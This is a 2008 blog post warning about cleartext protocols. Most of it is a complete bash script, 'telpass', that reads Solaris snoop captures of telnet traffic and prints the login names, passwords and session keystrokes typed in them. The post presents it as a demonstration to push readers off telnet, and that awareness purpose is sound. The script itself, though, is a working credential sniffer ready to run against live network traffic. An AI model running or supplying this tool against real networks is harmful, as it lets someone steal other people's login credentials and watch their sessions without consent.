Monday, July 14, 2008

The Dangers Of Using Cleartext Protocols On The Internet

Hey There,

Today, I'm putting up an updated version of a script we introduced back in April regarding grabbing logins and passwords using Solaris Unix's snoop command (See that link for a more detailed breakdown of how the script works). This version of the script is slightly more user friendly and is made so that it reads directly from the STDOUT of snoop (or, in more practical terms, takes it's STDIN from the STDOUT of the snoop command). To show how easy it is to use, and (of course) to encourage as many people as possible to quit using cleartext protocols, if it can possibly be avoided, we've put a quick demonstration video up on YouTube.com, which you can view below (Apologies for the poor video (The upper right of the screen is intentionally blurred during part of the video on purpose, to protect the guilty ;) It's a lot easier to read if you just go directly to the source):



Hope you enjoy the updated script and have absolutely no way to make use of it ;) Instead, focus your efforts on trying to figure out SSH timing. We're still working on extracting information from SSH. It might be a while... ;)

Enjoy :)


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# telpass - updated snoop login, password and session logger
# usage: snoop port 23.. etc|telpass
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

login_or_pwd=0
interactive_echo=0
sess_info=0
echo "Parsing binary snoop file $snoop_file"
echo "Note: In Session Mode, dots represent packets"
echo "that do not contain alphanumeric data"

while read line
do
echo $line| grep "Last" >/dev/null 2>&1
ll_yes_or_no=$?
if [ $ll_yes_or_no -eq 0 ]
then
echo
login_or_pwd=0
continue
fi
echo $line| grep "login: *$" >/dev/null 2>&1
l_yes_or_no=$?
if [ $l_yes_or_no -eq 0 ]
then
echo
echo "Possible login ID to follow - echo turned off to avoid duplicate characters: "
login_or_pwd=1
sess_info=0
continue
fi
echo $line| grep "Password:" >/dev/null 2>&1
p_yes_or_no=$?
if [ $p_yes_or_no -eq 0 ]
then
echo
echo "Possible password to follow - echo turned on: "
login_or_pwd=2
sess_info=0
continue
fi
if [ $login_or_pwd -eq 1 ]
then
if [ $interactive_echo -eq 1 ]
then
interactive_echo=0
continue
else
echo $line|awk -F" " '{ if ( length($NF) == 1 ) print $NF}'|xargs -ivar echo "var\c"
interactive_echo=1
continue
fi
fi
if [ $login_or_pwd -eq 2 ]
then
echo $line|awk -F" " '{ if ( length($NF) == 1 ) print $NF}'|xargs -ivar echo "var\c"
continue
fi
if [ $login_or_pwd -eq 0 -a $sess_info -eq 0 ]
then
echo
echo "Possible session info to follow - echo turned off to avoid duplicate characters:"
sess_info=1
fi
if [ $sess_info -eq 1 ]
then
if [ $interactive_echo -eq 1 ]
then
interactive_echo=0
continue
else
echo $line|awk -F" " '{ if ( length($NF) == 1 ) print $NF;else print "."}'|xargs -ivar echo "var\c"
interactive_echo=1
continue
fi
fi
done
echo
exit 0

, Mike